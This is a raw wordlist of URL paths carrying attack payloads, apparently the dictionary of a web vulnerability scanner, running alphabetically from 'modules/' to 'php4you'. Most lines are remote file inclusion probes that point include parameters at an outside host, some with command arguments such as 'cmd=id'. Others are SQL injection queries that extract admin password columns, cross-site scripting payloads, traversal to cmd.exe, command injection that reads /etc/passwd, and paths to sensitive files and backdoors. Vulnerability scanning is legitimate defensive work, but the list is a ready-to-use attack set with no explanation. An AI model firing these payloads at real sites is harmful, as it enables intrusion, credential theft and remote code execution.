modules/calendar/mod_calendar.php?absolute_path=http://www.yxlink.com/nvs_test.txt
modules/certinfo/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/character_roster/include.php?mod_root=http://www.yxlink.com/nvs_test.txt?
modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
modules/content/fields/author/field_edit_form.inc.php?setting[defaultvalue]=aa\x22  /><script>alert(window.location.href)</script>
modules/content/fields/author/field_edit_form.inc.php?setting[defaultvalue]=aa\x22  /><script>alert(window.location.href)</script>abxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaeada.php?a=<script>alert(32233333)</script>
modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.yxlink.com/nvs_test.txt
modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=http://www.yxlink.com/nvs_test.txt
modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
modules/documents/tree.documents.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.yxlink.com/nvs_test.txt
modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.yxlink.com/nvs_test.txt
modules/emails/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/events/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/fax/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/files/blocks/latest_files.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/files/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/files/list.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/filters/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://www.yxlink.com/nvs_test.txt?
modules/forums/blocks/latest_posts.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/gallery/gallery_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=http://www.yxlink.com/nvs_test.txt
modules/global/inc/content.inc.php?sIncPath=http://www.yxlink.com/nvs_test.txt?
modules/groupadm/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/groups/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/guestbook/index.php?CONFIG[local_root]=http://www.yxlink.com/nvs_test.txt?
modules/guestbook/showguestbook.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=http://www.yxlink.com/nvs_test.txt
modules/history/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/home.module.php?repmod=http://www.yxlink.com/nvs_test.txt?
modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.yxlink.com/nvs_test.txt
modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
modules/info/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/links/blocks/links.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/links/showlinks.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=http://www.yxlink.com/nvs_test.txt
modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://www.yxlink.com/nvs_test.txt
modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://www.yxlink.com/nvs_test.txt
modules/log/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/mail/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/menu/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/messages/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,md5(333),1,1,1,pass%20FROM%20runcms_users%20WHERE%201*&op=print_pn
modules/mod_as_category.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
modules/mod_btslideshow_pro/admin/images/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}//&.swf
modules/mod_calendar.php?absolute_path=http://www.yxlink.com/nvs_test.txt
modules/mod_flatmenu.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
modules/mod_weather.php?absolute_path=http://www.yxlink.com/nvs_test.txt
modules/module_db.php?pivot_path=http://www.yxlink.com/nvs_test.txt
modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/newbb/edit.php?forum=1&topic_id=1&viewmode=flat&order=ASC\x22><script>alert(2222)</script>&post_id=1
modules/newbb_plus/config.php?bbPath[root_theme]=http://www.yxlink.com/nvs_test.txt
modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,md5(333),1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2'&topic_id=2&viewmode=flat&order=0
modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,md5(333),1,1%20FROM%20runcms_users%20WHERE%201/
modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,md5(333),1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2&topic_id=2&viewmode=flat&order=0
modules/newbb_plus/votepolls.php?bbPath[path]=http://www.yxlink.com/nvs_test.txt
modules/news/blocks/latest_news.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/news/shownews.php?GLOBALS[rootdp]=&GLOBALS[language_home]=http://www.yxlink.com/nvs_test.txt
modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/organizations/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/phones/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
modules/pms/index.php?module_path=http://www.yxlink.com/nvs_test.txt???
modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.yxlink.com/nvs_test.txt
modules/poll/showpoll.php?GLOBALS[rootdp]=&GLOBALS[language_home]=http://www.yxlink.com/nvs_test.txt
modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.yxlink.com/nvs_test.txt
modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yxlink.com/nvs_test.txt
modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yxlink.com/nvs_test.txt?
modules/presence/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/projects/gantt.php?dPconfig[root_dir]=http://www.yxlink.com/nvs_test.txt
modules/projects/gantt2.php?dPconfig[root_dir]=http://www.yxlink.com/nvs_test.txt
modules/projects/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/projects/list.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/projects/summary.inc.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/projects/vw_files.php?dPconfig[root_dir]=http://www.yxlink.com/nvs_test.txt
modules/public/calendar.php?baseDir=http://www.yxlink.com/nvs_test.txt
modules/public/date_format.php?baseDir=http://www.yxlink.com/nvs_test.txt
modules/punish/p_error.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/punish/profile.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/reports/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/repository/comment_edit.php?com_itemid=1&com_order=0&com_mode=flat&cid=1&cid=1\x22><script>alert(2222)</script>&com_id=1
modules/reviews/review_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=http://www.yxlink.com/nvs_test.txt
modules/search/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/search/search.php?GLOBALS[rootdp]=&GLOBALS[language_home]=http://www.yxlink.com/nvs_test.txt
modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://www.yxlink.com/nvs_test.txt
modules/settings/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/snf/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/syslog/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/tasks/gantt.php?baseDir=http://www.yxlink.com/nvs_test.txt
modules/tasks/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/tasks/searchsimilar.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/tasks/summary.inc.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/threadstop/threadstop.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
modules/tml/block.tag.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt
modules/toprated/toprated.php?GLOBALS[rootdp]=&GLOBALS[language_home]=http://www.yxlink.com/nvs_test.txt
modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=http://www.yxlink.com/nvs_test.txt
modules/useradm/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/users/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/vWar_Account/includes/functions_common.php?vwar_root2=http://www.yxlink.com/nvs_test.txt
modules/visitors2/include/config.inc.php?lvc_include_dir=http://www.yxlink.com/nvs_test.txt?
modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yxlink.com/nvs_test.txt
modules/wfdownloads/viewcat.php?list=-'%20UNION%20SELECT%200,0,md5(333),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass,0,0%20FROM%20fXZtr_users%20WHERE%20level=5/*
modules/whatsnew/whatsnew.php?GLOBALS[rootdp]=&GLOBALS[language_home]=http://www.yxlink.com/nvs_test.txt
modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
modules/xfsection/modify.php?dir_module=http://www.yxlink.com/nvs_test.txt
modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
modulistica/mdl_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.yxlink.com/nvs_test.txt?
month.php?query=CalendarDetailsID=-1) UNION SELECT md5(333),0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
moodle/admin/utfdbmigrate.php?cmd=http://www.yxlink.com/nvs_test.txt
moosegallery/display.php?type=http://www.yxlink.com/nvs_test.txt?&cmd=[command]
mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
moteur/moteur.php?chemin=http://www.yxlink.com/nvs_test.txt?
movie/movie_index.tpl.php
movie_cls.php?full_path=http://www.yxlink.com/nvs_test.txt
mp3
mrtg.cgi?cfg=blah
msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.yxlink.com/nvs_test.txt
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/samples/adctest.asp
msadm/domain/index.php3?account_name=\x5C\x22><script>alert('Vulnerable')</script>
msadm/site/index.php3?authid=\x5C\x22><script>alert('Vulnerable')</script>
msadm/user/login.php3?account_name=\x5C\x22><script>alert('Vulnerable')</script>
msg.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,md5(333),3,2,3,4,5,6,7,8,9/*
msglist.adp?folder=<script>alert(document.cookie)</script>
msql
mssql
mt
mt-check.cgi
mt-static/mt.cfg
mt/mt.cfg
multihtml.pl?multi=/etc/passwd%00html
music
music/buycd.php?HTTP_DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
mutant_includes/mutant_functions.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt
mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.yxlink.com/nvs_test.txt
myadmin/
myadmin/main.php
mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yxlink.com/nvs_test.txt
myhome.php?action=messages&box=<form%20name=a><input%20name=i%20value=XSS></form><script>alert(document.a.i.value)</script>
myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
myinvoicer/config.inc
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
myphpcommander_path/system/lib/package.php?gl_root=http://www.yxlink.com/nvs_test.txt?cmd
myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
myps.php?action=donate&username=\x22/> <script>alert(3333)</script>
mysave.php?file=http://www.yxlink.com/nvs_test.txt
mysql
mysql.php
mysql/
mysql/main.php
mysqladmin/
mysqladmin/main.php
n
n.html
n.php
na_admin/
na_admin/ataglance.html
naboard_pnr.php?skin=http://www.yxlink.com/nvs_test.txt?
nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
nbproject
ncaster/admin/addons/archive/archive.php?adminfolder=http://www.yxlink.com/nvs_test.txt
nconf/detail.php?id=1%27
netbasic/websinfo.bas
netutils/findata.stm?host=<script>alert(document.cookie)</script>
netutils/findata.stm?user=<script>alert(document.cookie)</script>
netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
network.php
network_module_selector.php?path_prefix=http://www.yxlink.com/nvs_test.txt
new/?group_id=&amp;limit=50&amp;offset=50;select 1 as id,CURRENT_USER as forum_id, md5(333) as summary
newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,md5(333)%20from%20user/*
newfile.php
news.php?CONFIG[script_path]=http://www.yxlink.com/nvs_test.txt?
news.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
news.php?scriptpath=http://www.yxlink.com/nvs_test.txt?
news.php?vwar_root=http://www.yxlink.com/nvs_test.txt
news.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
news/include/createdb.php?langfile;=http://www.yxlink.com/nvs_test.txt?
news/include/customize.php?l=http://www.yxlink.com/nvs_test.txt?
news/js.php?f_id=1%29%20UNION%20SELECT%201,md5%28333%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23&type=hot
news/js.php?type=like&keyword=123%%2527%29/**/UNION/**/SELECT/**/1,md5(333),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
news/newstopic_inc.php?indir=http://www.yxlink.com/nvs_test.txt
news/scripts/news_page.php?script_path=http://www.yxlink.com/nvs_test.txt?
newsadmin.php?action=http://www.yxlink.com/nvs_test.txt
newsarchive.php?path_to_script=http://www.yxlink.com/nvs_test.txt?&cmd=ls
newsfeeds/includes/aggregator.php?zf_path=http://www.yxlink.com/nvs_test.txt
newsfeeds/includes/controller.php?zf_path=http://www.yxlink.com/nvs_test.txt
newsletter/newsletter.php?waroot=http://www.yxlink.com/nvs_test.txt
newsp/lib/class.Database.php?path=http://www.yxlink.com/nvs_test.txt?
newthread.php?acuparam=>\x22><ScRiPt>alert(333)</ScRiPt>
newticket.php?lang=http://www.yxlink.com/nvs_test.txt
newtopic.php?subpath=http://www.yxlink.com/nvs_test.txt
nikto.ida
noah/modules/noevents/templates/mfa_theme.php?tpls[1]=http://www.yxlink.com/nvs_test.txt
node/view/666\x5C\x22><script>alert(document.domain)</script>
nohup.out
nosuchurl/><script>alert('Vulnerable')</script>
noticias.php?inc=http://www.yxlink.com/nvs_test.txt?
ns-icons/
nst.php
nstview.php
nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://www.yxlink.com/nvs_test.txt
nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
nuke_path/iframe.php?file=http://www.yxlink.com/nvs_test.txt
nukebrowser.php?filnavn&filhead=http://www.yxlink.com/nvs_test.txt
nukebrowser.php?filnavn=http://www.yxlink.com/nvs_test.txt&filhead=XXpathXX&cmd=id
nul..cfm
nul..dbm
nul.cfm
nul.dbm
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
nulllllllllll
nulllllllllll.asp
nulllllllllll.aspx
nulllllllllll.bak
nulllllllllll.bas
nulllllllllll.box
nulllllllllll.btr
nulllllllllll.cfg
nulllllllllll.cfm
nulllllllllll.cgi
nulllllllllll.cnf
nulllllllllll.cobalt
nulllllllllll.conf
nulllllllllll.dat
nulllllllllll.db
nulllllllllll.dll
nulllllllllll.do
nulllllllllll.exe
nulllllllllll.htm
nulllllllllll.html
nulllllllllll.htpasswd
nulllllllllll.htr
nulllllllllll.htw
nulllllllllll.htx
nulllllllllll.ida
nulllllllllll.idc
nulllllllllll.idq
nulllllllllll.inc
nulllllllllll.ini
nulllllllllll.jsp
nulllllllllll.listprint
nulllllllllll.log
nulllllllllll.mdb
nulllllllllll.nsf
nulllllllllll.php
nulllllllllll.pl
nulllllllllll.pm
nulllllllllll.pwd
nulllllllllll.rar
nulllllllllll.snp
nulllllllllll.sql
nulllllllllll.txt
nulllllllllll.vts
nulllllllllll.xml
nulllllllllll.zip
nulllllllllll/
nulllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.html
nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.yxlink.com/nvs_test.txt
nusoap
nvs_test.php
nx/common/cds/menu.inc.php?c_path=http://www.yxlink.com/nvs_test.txt
nx/common/dbo/datasets.php?c_path=http://www.yxlink.com/nvs_test.txt
o
o.php
oVnlqCLHlp.html
oaboard_en/forum.php?inc=http://www.yxlink.com/nvs_test.txt
oauth
oc/Search/SQLQHit.asp
oc/Search/sqlqhit.asp
ocp-103/index.php?req_path=http://www.yxlink.com/nvs_test.txt
ocs/include/footer.inc.php?fullpath=http://www.yxlink.com/nvs_test.txt?
ocs/include/theme.inc.php?fullpath=http://www.yxlink.com/nvs_test.txt?
ocs/openemr-2.8.2/custom/import_xml.php?srcdir=http://www.yxlink.com/nvs_test.txt?
ocsreports/download.php?n=1&dl=2&o=3&v=4'union+all+select+concat(id,':',md5(333))+from+operators%23
odbc
oekaki/
oem_webstage/cgi-bin/oemapp_cgi
oem_webstage/oem.conf
ok.php
olbookmarks-0.7.4/themes/test1.php?http://www.yxlink.com/nvs_test.txt
old
old_files
oldfiles
oneadmin/adminfoot.php?path[docroot]=http://www.yxlink.com/nvs_test.txt
oneadmin/blogger/sampleblogger.php?path[docroot]=http://www.yxlink.com/nvs_test.txt?
oneadmin/config-bak.php?include_once=http://www.yxlink.com/nvs_test.txt
oneadmin/config.php?path[docroot]=http://www.yxlink.com/nvs_test.txt
oneadmin/ecommerce/sampleecommerce.php?path[docroot]=http://www.yxlink.com/nvs_test.txt?
online.php/>\x22><ScRiPt>alert(222)</ScRiPt>
online.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://www.yxlink.com/nvs_test.txt
open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://www.yxlink.com/nvs_test.txt?
open-flash-chart
open-flash-chart.swf
open-flash-chart/open-flash-chart.swf?get-data=(function(){alert(document.domain)})()
open-flash-chart2.swf
openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
openflashchart
openi-admin/base/fileloader.php?config[openi_dir]=http://www.yxlink.com/nvs_test.txt
openrat/themes/default/include/html/insert.inc.php?tpl_dir=http://www.yxlink.com/nvs_test.txt???
opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=http://www.yxlink.com/nvs_test.txt
oprocmgr-status
ops/gals.php?news_file=http://www.yxlink.com/nvs_test.txt
options.php?optpage=<script>alert('Vulnerable!')</script>
oracle
oracle.php
order.php?action=getarea&level=1%20%20or%20@`\x5C\xE2\x80\x99`=1%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),0x7e,(substring((Select%20concat(md5(3333),0x7e,password)%20from%20`%23@__admin`),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20@`\x5C\xE2\x80\x99`=0%23
order/login.php?svr_rootscript=http://www.yxlink.com/nvs_test.txt
orders
orders.csv
orders.log
orders.sql
orders.sql.gz
orders.txt
orders.xls
orid/index.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/approb.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/options.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/posts.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/search.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/statart.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/topman.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/vacadm.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/vacadma.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/vacadmb.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
osData/php121/php121db.php?php121dir=http://www.yxlink.com/nvs_test.txt%00
ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=http://www.yxlink.com/nvs_test.txt?
ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://www.yxlink.com/nvs_test.txt?
otype.asp?classid=1
outImg?domain=..&imgLocation=..&imgName=../accounts/root/postmaster/account.xml
output-build.txt
owa/?ae=Folder&t=IPF.Note&id=%3cscript%3ealert(%22HHH%22)%3c/script>
owimg.php3?path=http://www.yxlink.com/nvs_test.txt
owllib/memory/OWLMemoryProperty.php?OWLLIB_ROOT=http://www.yxlink.com/nvs_test.txt
ows-bin/perlidlc.bat?&dir
p
p-news.php?pn_lang=http://www.yxlink.com/nvs_test.txt
p.php
pEHwVvxWjk
p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=
p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=dir
p_list.aspx?keyword=%&maxPrice=0&minPrice=0%20And(@@version=0)
package
package.json
packages/sixeightforms/blocks/sixeightforms/swf/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}//&.swf
packages/vbattach/attach.php?package=http://www.yxlink.com/nvs_test.txt
packages/vbattach/attach.php?path=http://www.yxlink.com/nvs_test.txt
pafiledb.php?\x22><script>alert(333)</script>
pafiledb.php?action=admin&login=do&formname=-99'%20UNION%20SELECT%20admin_id,%20md5(333),%20'6f1ed002ab5595859014ebf0951522d9',%20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do
pafiledb.php?action=category&id=1&filelist=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E
pafiledb.php?action=category&id=1&pages=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E
pafiledb.php?action=viewall&start=20&sortby=name%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E
pafiledb.php?id=-99'%20UNION%20SELECT%200,md5(333),admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit
pafiledb.php?select=-99'%20UNION%20SELECT%200,md5(333),admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit
pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt
page
page.php?_PHPLIB[libdir]=http://www.yxlink.com/nvs_test.txt
page.php?goto=http://www.yxlink.com/nvs_test.txt
page.php?id=http://www.yxlink.com/nvs_test.txt
pageactionauthor.php?DIR=http://www.yxlink.com/nvs_test.txt
pages.php?id=-2+union+select+1,2,3,md5(333),5,6,7,8+from+information_schema.tables+where+table_schema=database()--
pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
pals-cgi?palsAction=restart&documentName=/etc/passwd
panel/common/theme/default/header_setup.php?path[docroot]=http://www.yxlink.com/nvs_test.txt
param_editor.php?folder=http://www.yxlink.com/nvs_test.txt?
parse/parser.php?WN_BASEDIR=http://www.yxlink.com/nvs_test.txt
pass
passwd
passwd/main.php?backend=\x22><script>alert('XSS')</script>&userid=stevejobs&return_to=&oldpassword=foo&newpassword0=foo&newpassword1=foo&submit=Change%20Password
password
password.inc
password.mdb
password.sqlite
password.txt
password/
passwords
passwords.mdb
passwords.sqlite
passwords.txt
patch/?language_id=http://www.yxlink.com/nvs_test.txt
patch/tools/send_reminders.php?noSet=0&includedir=http://www.yxlink.com/nvs_test.txt?
path/nw/article.php?id='
payment.php?act=return&class_name=-1'and%20(select%201%20from%20(select%20count(*),concat(md5(333),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
payment_gateway.php?api[classname]=http://www.yxlink.com/nvs_test.txt
paypalipn/ipnprocess.php?INC=http://www.yxlink.com/nvs_test.txt?
pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
pda/main.php?P=%df%5c%27or%201=1%23
pda/pda_projects.php?offset=http://www.yxlink.com/nvs_test.txt
pdf/
pdfs/
pear/Date/Date.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/Date/Date/Span.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/HTTP_Request/Request.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/Mail/Mail.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/Mail_Mime/mime.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/Net_Socket/Socket.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
perl-status
perl/
perl/-e%20%22system('cat%20/etc/passwd');\x5C%22
perl/env.pl
perl/printenv
perl/samples/env.pl
perl/samples/lancgi.pl
perl/samples/ndslogin.pl
perl/samples/volscgi.pl
personal
personal.mdb
personal.sqlite
pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
pgadmin
pgmyadmin
phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
phf?Qname=root%0Acat%20/etc/passwd%20
phfito/phfito-post?SRC_PATH=http://www.yxlink.com/nvs_test.txt
phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/stats.php
phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.yxlink.com/nvs_test.txt
photo
photo_album/apa_phpinclude.inc.php?apa_module_basedir=http://www.yxlink.com/nvs_test.txt
photo_comment.php?toroot=http://www.yxlink.com/nvs_test.txt
php
php-backdoor.php
php-coolfile/action.php?action=edit&file=config.php
php-inc/log.inc.php?SKIN_URL=http://www.yxlink.com/nvs_test.txt
php-include-robotsservices.php?page=http://www.yxlink.com/nvs_test.txt
php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
php-ofc-library
php-ping.php?count=1+%26+id%20-l+%26&submit=Ping%21
php.cgi?/etc/passwd
php.incs/common.inc.php?cm_basedir=http://www.yxlink.com/nvs_test.txt?
php.ini
php.php
php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
php/init.gallery.php?include_class=http://www.yxlink.com/nvs_test.txt/something
php/ip_status.php?ip=;cat%20/etc/passwd
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
php/php.exe?c:\x5Cboot.ini
php/php.exe?c:\x5Cwinnt\x5Cboot.ini
php121db.php?php121dir=http://www.yxlink.com/nvs_test.txt%00
php4you.php?dir=http://www.yxlink.com/nvs_test.txt?
